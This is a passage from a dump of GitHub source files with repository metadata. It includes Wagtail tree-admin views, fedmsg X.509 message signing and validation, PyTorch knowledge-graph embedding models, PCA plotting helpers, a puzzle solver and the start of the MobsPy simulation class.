model.fit(X, y, epochs=4, validation_split=.2)\n\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"NLPatVCU/Sentiment-Classification","sub_path":"keras_test/keras_test/lib/python3.6/site-packages/examples/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"27029762835","text":"from django.shortcuts import 
get_object_or_404, redirect\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom wagtail.wagtailadmin import messages\nfrom wagtailmodeladmin.views import (\n CreateView, ObjectSpecificView, WMAFormView, ConfirmDeleteView,\n permission_denied_response)\nfrom treebeard.forms import movenodeform_factory\nfrom .forms import MoveForm, NoIndentationMoveForm\n\n\nclass TreebeardCreateView(CreateView):\n \"\"\"\n A customised CreateView class to help create Treabeard nodes at specific\n positions in a tree\n \"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"\n When the view is loaded for a request, look for 'parent_id',\n 'sibling_id' and 'pos' values in POST or GET, and use them to assign\n values to the class instance for later use. Check out the\n `TreebeardButtonHelper` class to see where those additional values\n come from.\n \"\"\"\n r = request\n qs = self.model._default_manager.get_queryset()\n self.parent_obj = None\n self.sibling_obj = None\n self.tree_add_position = None\n self.parent_id = r.POST.get('parent_id') or r.GET.get('parent_id')\n self.sibling_id = r.POST.get('sibling_id') or r.GET.get('sibling_id')\n if self.parent_id is not None:\n self.parent_obj = get_object_or_404(qs, id=int(self.parent_id))\n elif self.sibling_id is not None:\n self.sibling_obj = get_object_or_404(qs, id=int(self.sibling_id))\n self.tree_add_position = r.POST.get('pos') or r.GET.get('pos')\n return super(TreebeardCreateView, self).dispatch(r, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n \"\"\"\n Add some additional variables to the context, so they can be used\n in the template to add some hidden field values to the form\n \"\"\"\n context = super(TreebeardCreateView, self).get_context_data(**kwargs)\n context.update({\n 'parent_obj': self.parent_obj,\n 'sibling_obj': self.sibling_obj,\n 'tree_add_position': self.tree_add_position,\n })\n return context\n\n def form_valid(self, form):\n \"\"\"\n Override what happens when the form is saved. 
Instead of straight-up\n saving a new object, we need to use treebeard's `add_child` or\n `add_sibling` methods to add node into the correct place.\n \"\"\"\n instance = form.save(commit=False)\n\n if self.parent_obj:\n self.parent_obj.add_child(instance=instance)\n elif self.sibling_obj:\n self.sibling_obj.add_sibling(instance=instance,\n pos=self.tree_add_position)\n else:\n self.model.add_root(instance=instance)\n\n messages.success(\n self.request, self.get_success_message(instance),\n buttons=self.get_success_message_buttons(instance)\n )\n return redirect(self.get_success_url())\n\n\nclass TreebeardMoveView(ObjectSpecificView, WMAFormView):\n page_title = _('Moving')\n\n def check_action_permitted(self):\n user = self.request.user\n return self.permission_helper.can_edit_object(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted():\n return permission_denied_response(request)\n return super(TreebeardMoveView, self).dispatch(request, *args,\n **kwargs)\n\n def get_meta_title(self):\n return _('Moving %s') % self.model_name.lower()\n\n def get_page_subtitle(self):\n return self.instance\n\n def get_form_class(self):\n if self.model_admin.move_form_select_indentation:\n formclass = MoveForm\n else:\n formclass = NoIndentationMoveForm\n return movenodeform_factory(self.model, form=formclass, fields=[])\n\n def get_form_kwargs(self):\n \"\"\"\n Returns the keyword arguments for instantiating the form.\n \"\"\"\n kwargs = super(TreebeardMoveView, self).get_form_kwargs()\n if hasattr(self, 'object'):\n kwargs.update({'instance': self.get_instance()})\n return kwargs\n\n def get_context_data(self, **kwargs):\n return {'view': self, 'form': self.get_form()}\n\n def get_template_names(self):\n return self.model_admin.get_templates('move')\n\n\nclass TreebeardConfirmDeleteView(ConfirmDeleteView):\n\n def delete_instance(self):\n self.model.objects.get(id=self.instance.id).delete()\n","repo_name":"Luperi/wagtailmodeladmin","sub_path":"wagtailmodeladmin/recipes/treebeard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"8433402834","text":"import logging\nimport os\nimport tempfile\nimport warnings\n\nfrom requests.exceptions import RequestException\nimport six\ntry:\n # Else we need M2Crypto and m2ext\n import M2Crypto\n import m2ext\n _m2crypto = True\nexcept ImportError:\n _m2crypto = False\n\nfrom . 
import utils\nfrom .x509_ng import _cryptography, sign as _crypto_sign, validate as _crypto_validate\nimport fedmsg.crypto # noqa: E402\nimport fedmsg.encoding # noqa: E402\n\n\n_log = logging.getLogger(__name__)\n\nif six.PY3:\n long = int\n\n\ndef _disabled_sign(*args, **kwargs):\n \"\"\"A fallback function that emits a warning when no crypto is being used.\"\"\"\n warnings.warn('Message signing is disabled because \"cryptography\" and '\n '\"pyopenssl\" or \"m2crypto\" are not available.')\n\n\ndef _disabled_validate(*args, **kwargs):\n \"\"\"A fallback function that emits a warning when no crypto is being used.\"\"\"\n warnings.warn('Message signature validation is disabled because (\"cryptography\"'\n ' and \"pyopenssl\") or \"m2crypto\" are not available.')\n\n\ndef _m2crypto_sign(message, ssldir=None, certname=None, **config):\n \"\"\" Insert two new fields into the message dict and return it.\n\n Those fields are:\n\n - 'signature' - the computed RSA message digest of the JSON repr.\n - 'certificate' - the base64 X509 certificate of the sending host.\n \"\"\"\n if ssldir is None or certname is None:\n error = \"You must set the ssldir and certname keyword arguments.\"\n raise ValueError(error)\n\n message['crypto'] = 'x509'\n\n certificate = M2Crypto.X509.load_cert(\n \"%s/%s.crt\" % (ssldir, certname)).as_pem()\n # Opening this file requires elevated privileges in stg/prod.\n rsa_private = M2Crypto.RSA.load_key(\n \"%s/%s.key\" % (ssldir, certname))\n\n digest = M2Crypto.EVP.MessageDigest('sha1')\n digest.update(fedmsg.encoding.dumps(message))\n\n signature = rsa_private.sign(digest.digest())\n\n # Return a new dict containing the pairs in the original message as well\n # as the new authn fields.\n return dict(message.items() + [\n ('signature', signature.encode('base64').decode('ascii')),\n ('certificate', certificate.encode('base64').decode('ascii')),\n ])\n\n\ndef _m2crypto_validate(message, ssldir=None, **config):\n \"\"\" Return true or false if the message is signed appropriately.\n\n Four things must be true:\n\n 1) The X509 cert must be signed by our CA\n 2) The cert must not be in our CRL.\n 3) We must be able to verify the signature using the RSA public key\n contained in the X509 cert.\n 4) The topic of the message and the CN on the cert must appear in the\n :ref:`conf-routing-policy` dict.\n\n \"\"\"\n\n if ssldir is None:\n raise ValueError(\"You must set the ssldir keyword argument.\")\n\n def fail(reason):\n _log.warn(\"Failed validation. %s\" % reason)\n return False\n\n # Some sanity checking\n for field in ['signature', 'certificate']:\n if field not in message:\n return fail(\"No %r field found.\" % field)\n if not isinstance(message[field], six.text_type):\n _log.error('msg[%r] is not a unicode string' % field)\n try:\n # Make an effort to decode it, it's very likely utf-8 since that's what\n # is hardcoded throughout fedmsg. Worst case scenario is it'll cause a\n # validation error when there shouldn't be one.\n message[field] = message[field].decode('utf-8')\n except UnicodeError as e:\n _log.error(\"Unable to decode the message '%s' field: %s\", field, str(e))\n return False\n\n # Peal off the auth datums\n signature = message['signature'].decode('base64')\n certificate = message['certificate'].decode('base64')\n message = fedmsg.crypto.strip_credentials(message)\n\n # Build an X509 object\n cert = M2Crypto.X509.load_cert_string(certificate)\n\n # Validate the cert. 
Make sure it is signed by our CA.\n # validate_certificate will one day be a part of M2Crypto.SSL.Context\n # https://bugzilla.osafoundation.org/show_bug.cgi?id=11690\n\n ca_location = config.get('ca_cert_location', 'https://fedoraproject.org/fedmsg/ca.crt')\n crl_location = config.get('crl_location', 'https://fedoraproject.org/fedmsg/crl.pem')\n fd, cafile = tempfile.mkstemp()\n try:\n ca_certificate, crl = utils.load_certificates(ca_location, crl_location)\n os.write(fd, ca_certificate.encode('ascii'))\n os.fsync(fd)\n ctx = m2ext.SSL.Context()\n ctx.load_verify_locations(cafile=cafile)\n if not ctx.validate_certificate(cert):\n ca_certificate, crl = utils.load_certificates(\n ca_location, crl_location, invalidate_cache=True)\n with open(cafile, 'w') as f:\n f.write(ca_certificate)\n ctx = m2ext.SSL.Context()\n ctx.load_verify_locations(cafile=cafile)\n if not ctx.validate_certificate(cert):\n return fail(\"X509 certificate is not valid.\")\n except (IOError, RequestException) as e:\n _log.error(str(e))\n return False\n finally:\n os.close(fd)\n os.remove(cafile)\n\n if crl:\n try:\n fd, crlfile = tempfile.mkstemp(text=True)\n os.write(fd, crl.encode('ascii'))\n os.fsync(fd)\n crl = M2Crypto.X509.load_crl(crlfile)\n finally:\n os.close(fd)\n os.remove(crlfile)\n # FIXME -- We need to check that the CRL is signed by our own CA.\n # See https://bugzilla.osafoundation.org/show_bug.cgi?id=12954#c2\n # if not ctx.validate_certificate(crl):\n # return fail(\"X509 CRL is not valid.\")\n\n # FIXME -- we check the CRL, but by doing string comparison ourselves.\n # This is not what we want to be doing.\n # There is a patch into M2Crypto to handle this for us. We should use it\n # once its integrated upstream.\n # See https://bugzilla.osafoundation.org/show_bug.cgi?id=12954#c2\n revoked_serials = [long(line.split(': ')[1].strip(), base=16)\n for line in crl.as_text().split('\\n')\n if 'Serial Number:' in line]\n if cert.get_serial_number() in revoked_serials:\n subject = cert.get_subject()\n\n signer = '(no CN)'\n if subject.nid.get('CN'):\n entry = subject.get_entries_by_nid(subject.nid['CN'])[0]\n if entry:\n signer = entry.get_data().as_text()\n\n return fail(\"X509 cert %r, %r is in the Revocation List (CRL)\" % (\n signer, cert.get_serial_number()))\n\n # If the cert is good, then test to see if the signature in the messages\n # matches up with the provided cert.\n rsa_public = cert.get_pubkey().get_rsa()\n digest = M2Crypto.EVP.MessageDigest('sha1')\n digest.update(fedmsg.encoding.dumps(message))\n try:\n if not rsa_public.verify(digest.digest(), signature):\n raise M2Crypto.RSA.RSAError(\"RSA signature failed to validate.\")\n except M2Crypto.RSA.RSAError as e:\n return fail(str(e))\n\n # Now we know that the cert is valid. 
The message is *authenticated*.\n # * Next step: Authorization *\n\n # Load our policy from the config dict.\n routing_policy = config.get('routing_policy', {})\n\n # Determine the name of the signer of the message.\n # This will be something like \"shell-pkgs01.stg.phx2.fedoraproject.org\"\n subject = cert.get_subject()\n signer = subject.get_entries_by_nid(subject.nid['CN'])[0]\\\n .get_data().as_text()\n\n return utils.validate_policy(\n message.get('topic'), signer, routing_policy, config.get('routing_nitpicky', False))\n\n\n# Maintain the ``sign`` and ``validate`` APIs while preferring cryptography and\n# pyOpenSSL over M2Crypto.\nif _cryptography:\n sign = _crypto_sign\n validate = _crypto_validate\nelif _m2crypto:\n sign = _m2crypto_sign\n validate = _m2crypto_validate\nelse:\n sign = _disabled_sign\n validate = _disabled_validate\n","repo_name":"fedora-infra/fedmsg","sub_path":"fedmsg/crypto/x509.py","file_name":"x509.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"99"} +{"seq_id":"20722116339","text":"from pathlib import Path\n\nimport torch\nfrom torch import nn\nfrom common.const.model import MDL_Q_ENC\n\nclass CheckpointingModule(nn.Module):\n def __init__(self, **config):\n super().__init__()\n self.config = config\n\n @classmethod\n def checkpoint_path(cls, directory: str):\n return Path(directory, '%s.pt' % cls.__name__)\n\n @classmethod\n def create_or_load(cls, path: str = None, **config):\n state = None\n\n if path is not None and cls.checkpoint_path(path).exists():\n print(\"Loading from pretrained.\")\n with cls.checkpoint_path(path).open('rb') as fp:\n load_preset = torch.load(fp)\n\n new_config = {}\n new_config[MDL_Q_ENC] = config[MDL_Q_ENC]\n new_config.update(load_preset['config'])\n state = load_preset['state']\n\n model = cls(**new_config)\n else:\n model = cls(**config)\n \n if state is not None:\n print(\"State is not None\")\n new_state = state.copy()\n for key in state.keys():\n if 'equation' in key:\n new_state.pop(key)\n new_state[key.replace('equation.','')] = state[key]\n model.load_state_dict(state, strict=False)\n\n return model\n\n def save(self, directory: str):\n with self.checkpoint_path(directory).open('wb') as fp:\n torch.save({\n 'config': self.config,\n 'state': self.state_dict()\n }, fp)\n\n\n__all__ = ['CheckpointingModule']\n","repo_name":"rsk25/PCMG","sub_path":"model/base/chkpt.py","file_name":"chkpt.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18752880318","text":"lines = open(\"input1.txt\").readlines()\n\nLEFT = \"L\"\nRIGHT = \"R\"\n\ninstructions = []\n\nfor instruction in lines[0]:\n\tinstructions.append(instruction)\ninstructions.pop(len(instructions) - 1)\n\npairs = [] #name, left, right\n\nfor line in lines:\n\tif line.find(\"=\") > 0:\n\t\tlineChunks = line.split()\n\t\tpairName = lineChunks[0]\n\t\tleft = lineChunks[2][1:4]\n\t\tright = lineChunks[3][0:3]\n\t\tpairs.append([pairName, left, right])\n\ncurrentName = \"AAA\"\ngoalName = \"ZZZ\"\nsteps = 0\n\n\ndone = False\nwhile not done:\n\tfor instruction in instructions:\n\t\tfor pair in pairs:\n\t\t\tpairName = pair[0]\n\t\t\tif pairName == currentName:\n\t\t\t\tif instruction == LEFT:\n\t\t\t\t\tcurrentName = pair[1]\n\t\t\t\telif instruction == RIGHT:\n\t\t\t\t\tcurrentName = pair[2]\n\t\t\t\tbreak\n\t\tsteps += 1\n\t\tif currentName == goalName:\n\t\t\tdone = 
True\n\nprint(steps)\n\n","repo_name":"PimClappers/AtfentufKood","sub_path":"2023/day8/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"25246747450","text":"import matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.cluster.hierarchy import dendrogram\n\n\ndef display_circles(pcs, n_comp, pca, axis_ranks, labels=None, label_rotation=0, lims=None):\n for d1, d2 in axis_ranks: # On affiche les 3 premiers plans factoriels, donc les 6 premières composantes\n if d2 < n_comp:\n\n # initialisation de la figure\n fig, ax = plt.subplots(figsize=(7,6))\n\n # détermination des limites du graphique\n if lims is not None :\n xmin, xmax, ymin, ymax = lims\n elif pcs.shape[1] < 30 :\n xmin, xmax, ymin, ymax = -1, 1, -1, 1\n else :\n xmin, xmax, ymin, ymax = min(pcs[d1,:]), max(pcs[d1,:]), min(pcs[d2,:]), max(pcs[d2,:])\n\n # affichage des flèches\n # s'il y a plus de 30 flèches, on n'affiche pas le triangle à leur extrémité\n if pcs.shape[1] < 30 :\n plt.quiver(np.zeros(pcs.shape[1]), np.zeros(pcs.shape[1]),\n pcs[d1,:], pcs[d2,:], \n angles='xy', scale_units='xy', scale=1, color=\"grey\")\n # (voir la doc : https://matplotlib.org/api/_as_gen/matplotlib.pyplot.quiver.html)\n else:\n lines = [[[0,0],[x,y]] for x,y in pcs[[d1,d2]].T]\n ax.add_collection(LineCollection(lines, axes=ax, alpha=.1, color='black'))\n \n # affichage des noms des variables \n if labels is not None: \n for i,(x, y) in enumerate(pcs[[d1,d2]].T):\n if x >= xmin and x <= xmax and y >= ymin and y <= ymax :\n plt.text(x, y, labels[i], fontsize='14', ha='center', va='center', rotation=label_rotation, color=\"blue\", alpha=0.5)\n \n # affichage du cercle\n circle = plt.Circle((0,0), 1, facecolor='none', edgecolor='b')\n plt.gca().add_artist(circle)\n\n # définition des limites du graphique\n plt.xlim(xmin, xmax)\n plt.ylim(ymin, ymax)\n \n # affichage des lignes horizontales et verticales\n plt.plot([-1, 1], [0, 0], color='grey', ls='--')\n plt.plot([0, 0], [-1, 1], color='grey', ls='--')\n\n # nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel('F{} ({}%)'.format(d1+1, round(100*pca.explained_variance_ratio_[d1],1)))\n plt.ylabel('F{} ({}%)'.format(d2+1, round(100*pca.explained_variance_ratio_[d2],1)))\n\n plt.title(\"Cercle des corrélations (F{} et F{})\".format(d1+1, d2+1))\n plt.show(block=False)\n \ndef display_factorial_planes(X_projected, n_comp, pca, axis_ranks, labels=None, alpha=1, illustrative_var=None):\n for d1,d2 in axis_ranks:\n if d2 < n_comp:\n \n # initialisation de la figure \n fig = plt.figure(figsize=(7,6))\n \n # affichage des points\n if illustrative_var is None:\n plt.scatter(X_projected[:, d1], X_projected[:, d2], alpha=alpha)\n else:\n illustrative_var = np.array(illustrative_var)\n for value in np.unique(illustrative_var):\n selected = np.where(illustrative_var == value)\n plt.scatter(X_projected[selected, d1], X_projected[selected, d2], alpha=alpha, label=value)\n plt.legend()\n\n # affichage des labels des points\n if labels is not None:\n for i,(x,y) in enumerate(X_projected[:,[d1,d2]]):\n plt.text(x, y, labels[i],\n fontsize='14', ha='center',va='center') \n \n # détermination des limites du graphique\n boundary = np.max(np.abs(X_projected[:, [d1,d2]])) * 1.1\n plt.xlim([-boundary,boundary])\n plt.ylim([-boundary,boundary])\n \n # affichage des lignes horizontales 
et verticales\n plt.plot([-100, 100], [0, 0], color='grey', ls='--')\n plt.plot([0, 0], [-100, 100], color='grey', ls='--')\n\n # nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel('F{} ({}%)'.format(d1+1, round(100*pca.explained_variance_ratio_[d1],1)))\n plt.ylabel('F{} ({}%)'.format(d2+1, round(100*pca.explained_variance_ratio_[d2],1)))\n\n plt.title(\"Projection des individus (sur F{} et F{})\".format(d1+1, d2+1))\n plt.show(block=False)\n\ndef display_scree_plot(pca):\n scree = pca.explained_variance_ratio_*100\n plt.bar(np.arange(len(scree))+1, scree)\n plt.plot(np.arange(len(scree))+1, scree.cumsum(),c=\"red\",marker='o')\n plt.xlabel(\"rang de l'axe d'inertie\")\n plt.ylabel(\"pourcentage d'inertie\")\n plt.title(\"Eboulis des valeurs propres\")\n plt.show(block=False)\n\ndef plot_dendrogram(Z, names):\n plt.figure(figsize=(10,25))\n plt.title('Hierarchical Clustering Dendrogram')\n plt.xlabel('distance')\n dendrogram(\n Z,\n labels = names,\n orientation = \"left\",\n )\n plt.show()\n\n# Afficher un tableau des pourcentages des valeurs NaN pour chaque colonne\ndef tableau_pourcentage_NaN(dataframe):\n pourcentage_valeur_naan = pd.DataFrame(\n dataframe.isna().mean().round(4) * 100,\n columns=['Données manquantes en %'\n ]).sort_values(by='Données manquantes en %', ascending=False)\n return (pourcentage_valeur_naan)\n\ndef graph_bar(df_pourcentage, column, titre, xlabel, ylabel):\n\n df_graphique = df_pourcentage.loc[:, [column, 'Nombre']].set_index(\n column)['Nombre'].copy()\n\n plt.figure(figsize=(15, 10))\n\n sns.set(style=\"whitegrid\")\n g = sns.barplot(x=df_graphique, y=df_graphique.index, orient='h')\n\n plt.title(titre, fontsize=20)\n plt.xlabel(xlabel, fontsize=14)\n plt.ylabel(ylabel, fontsize=14)\n\n # Afficher le nombre à droite du graphique à barres\n for i, v in enumerate(df_graphique.values.tolist()):\n g.text(v + 3, i + .25, str(v), color='black', fontweight='normal')\n\ndef graph_multivarie(column1, column2, title, df):\n df_selection = df[[column1, column2]]\n df_selection_top = df_selection.dropna()\n\n df_selection_pourcentage = df_selection_top.groupby([\n column2\n ]).size().reset_index(name='Nombre').sort_values('Nombre',\n ascending=False).head(50)\n rows = df_selection_top.shape[0]\n df_selection_pourcentage[\n 'Pourcentage'] = df_selection_pourcentage['Nombre'] / rows * 100\n\n dict_selection_pourcentage = {}\n\n liste_selection_50 = df_selection_pourcentage[column2].tolist()\n\n # Nous plaçons les valeurs de la colonne en clé et leurs moyennes en valeurs \n # dans le dictionnaire 'dict_selection_pourcentage'\n for i in liste_selection_50:\n a = df_selection.loc[df_selection[column2] == i]\n a = a[column1].mean()\n dict_selection_pourcentage[i] = a\n\n # Tri les valeurs du dictionnaire en ordre croissant\n liste_selection = sorted(dict_selection_pourcentage.items(),\n key=lambda x: x[1])\n\n # Top 10 des pays ayant les produits avec le meilleur nutriscore en moyenne\n liste_selection = liste_selection[:10]\n\n dict_moyenne_selection_10 = {}\n\n for i in liste_selection:\n dict_moyenne_selection_10[i[0]] = i[1]\n\n plt.figure(figsize=(15, 10), dpi=80)\n\n ind = np.arange(len(dict_moyenne_selection_10))\n palette = sns.color_palette(\"husl\", len(dict_moyenne_selection_10))\n\n plt.bar(ind, list(dict_moyenne_selection_10.values()), color=palette)\n plt.xticks(ind, list(dict_moyenne_selection_10.keys()))\n plt.title(title)\n plt.show()\n\n return 
dict_moyenne_selection_10\n\n","repo_name":"reda76/sante-publique-france","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14058165959","text":"import torch\nimport torch.nn as nn\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, List, Dict\nimport torch.nn.functional as F\n\n\nclass TKGE(nn.Module, ABC):\n def __init__(self, sizes, rank, margin, bias, init_size):\n super(TKGE, self).__init__()\n self.sizes = sizes\n self.rank = rank\n self.bias = bias\n self.init_size = init_size\n self.margin = torch.Tensor([margin])\n\n @abstractmethod\n def get_queries(self, x_data, eval_mode):\n pass\n\n def score(self, lhs, rhs, eval_mode=False):\n lhs_e, lhs_biases = lhs # head, relation, timestamp\n rhs_e, rhs_biases = rhs # tail\n score = -torch.norm(lhs_e - rhs_e, dim=1)\n if self.bias == 'constant':\n return self.margin.item() + score\n elif self.bias == 'learn':\n if eval_mode:\n return x_biases + y_biases.t() + score\n else:\n return x_biases + y_biases + score\n else:\n return score\n\n def forward(self, x_data, eval_mode=False):\n # get embeddings and similarity scores\n lhs_e, rhs_e, lhs_biases, rhs_biases, factors = self.get_queries(x_data)\n\n predictions = self.score((lhs_e, lhs_biases), (rhs_e, rhs_biases), eval_mode)\n\n return predictions, factors\n\nclass BaseE(TKGE):\n def __init__(self, args):\n super(BaseE, self).__init__(args.sizes, args.rank, args.margin, args.bias,args.init_size)\n\n def marginrankingloss(self, positive_score, negative_score):\n if torch.cuda.is_available():\n rl = nn.ReLU().cuda()\n l = torch.sum(rl(negative_score - positive_score))\n else:\n rl = nn.ReLU()\n l = torch.sum(rl(negative_score - positive_score))\n return l\n\n def loglikelihoodloss(self, positive_score, negative_score):\n positive_sample_loss = -F.logsigmoid(positive_score).mean()\n negative_sample_loss = -F.logsigmoid(-negative_score).mean()\n l = (positive_sample_loss + negative_sample_loss) / 2\n return l\n\nclass NaiveTransE(BaseE):\n \"\"\"Euclidean translations https://www.utc.fr/~bordesan/dokuwiki/_media/en/transe_nips13.pdf\"\"\"\n def __init__(self, args):\n super(NaiveTransE, self).__init__(args)\n\n self.embeddings = nn.ModuleList([])\n self.embeddings.append(nn.Embedding(self.sizes[0],self.rank))\n self.embeddings.append(nn.Embedding(self.sizes[1],self.rank//2))\n self.embeddings.append(nn.Embedding(self.sizes[3],self.rank//2))\n\n self.bh = nn.Embedding(self.sizes[0], 1)\n self.bh.weight.data = torch.zeros((self.sizes[0], 1))\n self.bt = nn.Embedding(self.sizes[0], 1)\n self.bt.weight.data = torch.zeros((self.sizes[0], 1))\n\n # entities\n self.embeddings[0].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # relations: half dimension because of concatenation\n self.embeddings[1].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank//2))\n # timestamps: half dimension because of concatenation\n self.embeddings[2].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank//2))\n\n def get_queries(self, x_data, eval_mode = False):\n head_e = self.embeddings[0](x_data[:,0])\n rel_e = self.embeddings[1](x_data[:,1])\n ts_e = self.embeddings[2](x_data[:,3])\n lhs_biases = self.bh(x_data[:, 0])\n\n if eval_mode:\n tail_e, rhs_biases = self.embeddings[0].weight, self.bt.weight\n else:\n tail_e, rhs_biases = self.embeddings[0](x_data[:,2]), self.bt(x_data[:,2])\n\n lhs = head_e 
+ torch.cat((rel_e, ts_e), dim=-1)\n rhs = tail_e\n # score = -torch.norm(head_e + torch.cat((rel_e,ts_e),dim=-1) - tail_e, dim=1)\n return lhs, rhs, lhs_biases, rhs_biases, [head_e, rel_e, tail_e, ts_e]\n\n\n\nclass VectorTransE(BaseE):\n \"\"\"Euclidean translations https://www.utc.fr/~bordesan/dokuwiki/_media/en/transe_nips13.pdf\"\"\"\n\n def __init__(self, args):\n super(VectorTransE, self).__init__(args)\n\n self.embeddings = nn.ModuleList([nn.Embedding(s, self.rank) for s in [self.sizes[0], self.sizes[1], self.sizes[3]]])\n # entities\n self.embeddings[0].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # relations\n self.embeddings[1].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # timestamps\n self.embeddings[2].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n\n self.bh = nn.Embedding(self.sizes[0], 1)\n self.bh.weight.data = torch.zeros((self.sizes[0], 1))\n self.bt = nn.Embedding(self.sizes[0], 1)\n self.bt.weight.data = torch.zeros((self.sizes[0], 1))\n\n def get_queries(self, x_data, eval_mode=False):\n head_e = self.embeddings[0](x_data[:, 0])\n rel_e = self.embeddings[1](x_data[:, 1])\n ts_e = self.embeddings[2](x_data[:, 3])\n x_biases = self.bh(x_data[:, 0])\n\n if eval_mode:\n tail_e, y_biases = self.embeddings[0].weight, self.bt.weight\n else:\n tail_e, y_biases = self.embeddings[0](x_data[:, 2]), self.bt(x_data[:, 2])\n\n x = head_e + rel_e + ts_e\n y = tail_e\n # score = -torch.norm(head_e + torch.cat((rel_e,ts_e),dim=-1) - tail_e, dim=1)\n return x, y, x_biases, y_biases, [head_e, rel_e, tail_e, ts_e]","repo_name":"p3DDah/DL_LAB","sub_path":"Topic 7/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35945547305","text":"\"\"\"\n Main MobsPy module. 
It stocks the Simulation class which is responsible for simulating a Model\n\"\"\"\nfrom contextlib import contextmanager\nfrom mobspy.parameter_scripts import parameter_reader as pr\nfrom mobspy.parameters.default_reader import get_default_parameters\nfrom mobspy.parameters.example_reader import get_example_parameters\nimport mobspy.parameter_scripts.parametric_sweeps as ps\nfrom mobspy.plot_params.default_plot_reader import get_default_plot_parameters\nimport mobspy.sbml_simulator.builder as sbml_builder\nimport mobspy.sbml_simulator.run as sbml_run\nimport mobspy.plot_scripts.default_plots as dp\nimport mobspy.data_handler.process_result_data as dh\nfrom mobspy.data_handler.time_series_object import *\nfrom mobspy.modules.user_functions import *\nfrom mobspy.modules.set_counts_module import set_counts\nimport json\nimport os\nimport inspect\nimport mobspy.modules.unit_handler as uh\nfrom pint import UnitRegistry\nfrom joblib import Parallel, delayed\nimport time\n\n\nclass Simulation:\n\n # Event Implementation\n @classmethod\n def event_compilation_error(cls):\n simlog.error('The event condition did not compile.\\n'\n 'Please make sure it follows the following format:\\n'\n 'For simple conditions - if C1 \\n'\n 'For and based condition - if (C1) & (C2)\\n'\n 'For or based conditions - if (C1) & (C2)\\n'\n 'Please include the parentheses')\n\n def event_context_finish(self):\n self._event_time = 0\n Species.reset_simulation_context()\n self._species_to_set = set()\n self._context_not_active = True\n\n def event_context_add(self, time, trigger):\n\n event_data = {'event_time': time, 'event_counts': list(self.current_event_count_data),\n 'trigger': trigger}\n\n self.current_event_count_data = []\n self.pre_number_of_context_comparisons = self.number_of_context_comparisons\n self.number_of_context_comparisons = 0\n\n if len(event_data['event_counts']) != 0:\n self.total_packed_events.append(event_data)\n\n self.event_context_finish()\n\n def event_context_initiator(self):\n\n # Set context in all meta-species\n if len(self._species_to_set) == 0:\n Species.set_simulation_context(self)\n else:\n pass\n\n def _event_handler(self):\n if self._context_not_active:\n self._context_not_active = False\n self.__dict__['parameters']['_with_event'] = True\n self.event_context_initiator()\n else:\n simlog.error('MobsPy does not support multiple context calls')\n\n @contextmanager\n def event_condition(self, trigger, delay=0):\n try:\n code_line = inspect.stack()[2].code_context[0][:-1]\n if '==' in code_line:\n simlog.error('Equality comparison operator (==) not allowed for MobsPy events \\n' +\n 'Please use (A <= n) & (A >= n) if necessary', stack_index=3)\n if type(trigger) == bool or type(trigger) == float or type(trigger) == int:\n simlog.error(f'MobsPy has received an invalid trigger type: {type(trigger)} \\n' +\n f'Please make sure you are not using the operator == for creating event conditions \\n'\n , stack_index=3)\n self._conditional_event = True\n self._event_handler()\n yield 0\n finally:\n delay = uh.convert_time(delay)\n self._conditional_event = False\n self.event_context_add(delay, trigger)\n\n @contextmanager\n def event_time(self, time):\n try:\n self._event_handler()\n yield 0\n finally:\n time = uh.convert_time(time)\n self.event_context_add(time, 'true')\n\n def __init__(self, model, names=None, parameters=None, plot_parameters=None):\n \"\"\"\n Constructor of the simulation object\n\n Parameters:\n :param model: (List_Species object) Meta-Species object for modeling\n :param 
names: (dict) names of the meta-species in globals() format. If none it uses the variable names\n :param parameters: (dict) Simulation object parameters. If none takes default parameters\n :param plot_parameters: (dict) Parameters for plotting. If none takes default\n \"\"\"\n\n # Event Variable Definitions\n self._species_to_set = set()\n self._event_time = 0\n self.previous_trigger = None\n self.current_event_count_data = []\n self.total_packed_events = []\n self.number_of_context_comparisons = 0\n self.pre_number_of_context_comparisons = 0\n self._list_of_models = []\n self._list_of_parameters = []\n self._context_not_active = True\n self._assigned_species_list = []\n self._conditional_event = False\n self._end_condition = None\n self.model_parameters = {}\n self.sbml_data_list = []\n self._parameter_list_of_dic = []\n\n # Must copy to avoid reference assignment\n self.model = List_Species(model)\n self.names = names\n\n if not isinstance(model, Species) and not isinstance(model, List_Species):\n simlog.error('Model must be formed only by Species objects or List_Species objects \\n'\n f'Model type {type(model)} and it is {model}')\n\n self.orthogonal_vector_structure = 